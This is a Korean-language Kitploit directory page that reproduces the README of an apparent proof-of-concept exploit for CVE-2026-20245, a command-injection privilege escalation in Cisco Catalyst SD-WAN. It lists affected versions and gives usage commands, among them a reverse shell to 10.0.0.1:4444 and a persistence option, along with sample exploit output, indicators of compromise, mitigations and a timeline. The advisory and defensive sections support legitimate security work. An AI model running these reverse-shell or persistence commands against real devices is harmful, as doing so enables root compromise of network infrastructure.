Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
도구/GitHubGitHub/fevar54/cve-2026-20245---cisco-sd-wan-privilege-escalation-exploit
Privilege EscalationVulnerability AnalysisExploitationWeb Application ExploitationNetwork SecurityPenetration TestingCommand and ControlLearning & Education

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유
GitHub
fevar54/cve-2026-20245---cisco-sd-wan-privilege-escalation-exploit

CVE-2026-20245---Cisco-SD-WAN-Privilege-Escalation-Exploit

**이 코드는 오직 교육적 목적과 승인된 보안 테스트를 위해서만 사용됩니다.**

저장소 보기
343개월 전아직 검토되지 않음

CVE-2026-20245 - Cisco SD-WAN 권한 상승 익스플로잇

Security Rating CVSS CISA KEV

⚠️ 경고

이 코드는 교육 목적 및 승인된 보안 테스트에만 사용됩니다.

📋 설명

CVE-2026-20245는 Cisco Catalyst SD-WAN Controller (vSmart), Cisco Catalyst SD-WAN Manager (vManage), Cisco Catalyst SD-WAN Validator (vBond)의 CLI에서 권한 상승 취약점입니다. netadmin 권한이 있는 인증된 공격자는 특수하게 조작된 파일을 업로드하여 root로 임의 명령을 실행할 수 있습니다.

기술 세부 사항

필드값
CVECVE-2026-20245
CVSS7.8 (High)
벡터AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
구성 요소CLI / CSV Upload
유형Command Injection (CWE-116)

🎯 영향을 받는 버전

제품취약한 버전
Cisco Catalyst SD-WAN Manager< 20.18.3.1
Cisco Catalyst SD-WAN Controller (vSmart)< 20.18.3.1
Cisco Catalyst SD-WAN Validator (vBond)< 20.18.3.1

특정 취약 버전:

  • 20.9.x (모두)
  • 20.10.x - 20.12.5.3
  • 20.12.6 - 20.12.6.1
  • 20.12.7
  • 20.13.x - 20.15.4.3
  • 20.15.5 - 20.15.5.1
  • 20.16.x - 20.18.2.1

🔧 설치

root@kitploit:~
# Clone repository
git clone https://github.com/username/CVE-2026-20245-PoC
cd CVE-2026-20245-PoC

# Install dependencies
pip install -r requirements.txt

# Give permissions
chmod +x exploit.py

📦 의존성

txt requests>=2.31.0

🚀 사용법

root@kitploit:~
# Check version
python3 exploit.py -t 192.168.1.1 -u netadmin -p password --check-only
root@kitploit:~
# Execute command
python3 exploit.py -t 192.168.1.1 -u netadmin -p password -c "id"
root@kitploit:~
# Reverse shell
python3 exploit.py -t 192.168.1.1 -u netadmin -p password -c "bash -i >& /dev/tcp/10.0.0.1/4444 0>&1"
root@kitploit:~
# Install persistence
python3 exploit.py -t 192.168.1.1 -u netadmin -p password -c "whoami" --persist

🔍 예상 출력

root@kitploit:~
╔═══════════════════════════════════════════════════════════════════╗
║  CVE-2026-20245 - Cisco SD-WAN Privilege Escalation Exploit     ║
║  Command Injection via Crafted File Upload                       ║
║  CVSS: 7.8 (High) | CISA KEV: 2026-06-09                        ║
╚═══════════════════════════════════════════════════════════════════╝

[*] Authenticating to 192.168.1.1...
[+] Authentication successful
[+] XSRF Token obtained
[*] Attempting to execute: id
[*] Trying endpoint: /system/device/upload
[*] Uploading malicious file...
[+] File uploaded successfully
[*] Triggering command injection...
[+] Trigger response: 200
[+] Command injection successful via /system/device/upload

============================================================
[✓] EXPLOIT SUCCESSFUL
[✓] Command executed as root
[!] System is VULNERABLE - Apply Cisco patch immediately
============================================================

🔍 침해 지표 (IOC)

로그 확인 (/var/log/scripts.log)

root@kitploit:~
# 의심스러운 활동 검색
grep -E "\.csv|malicious|upload_serial" /var/log/scripts.log

# 찾아야 할 특정 명령어
Apr 15 09:44:57 vmanage vScript: /usr/bin/vconfd_script_upload_tenant_list.sh -cli path /home/admin/malicious.csv

의심스러운 파일

  • /home/admin/*.csv (승인되지 않은 CSV 파일)
  • /tmp/*.csv
  • /var/log/scripts.log 비정상 항목 포함

프로세스

root@kitploit:~
# 비정상적인 root 프로세스 검색
ps aux | grep -E "bash|sh|nc|ncat|socat"

🛡️ 완화

옵션 1 - 수정 버전으로 업데이트 (권장)

버전수정 릴리스
20.18.2.1 이하20.18.3.1

옵션 2 - 접근 제한

  • 관리 네트워크에 대한 관리자 접근 제한
  • 다중 인증 사용
  • CSV 업로드 활동 모니터링

옵션 3 - 보안 구성

root@kitploit:~
# 불필요한 경우 serial number 업로드 비활성화
no feature upload-serial-numbers

# netadmin 권한 제한
admin privilege restrict

📚 참고 자료

  • Cisco Security Advisory
  • NVD - CVE-2026-20245
  • CISA KEV Catalog

📊 타임라인

날짜이벤트
2026-05-14Cisco 초기 권고 발표
2026-06-04CVE 공식 발표
2026-06-09CISA가 KEV에 추가
2026-06-23CISA 패치 마감일

⚖️ 면책 조항

이 소프트웨어는 "있는 그대로" 제공되며 보증이 없습니다. 저자는 오용에 대해 책임을 지지 않습니다. 승인된 시스템에서만 사용하십시오.

도구 다운로드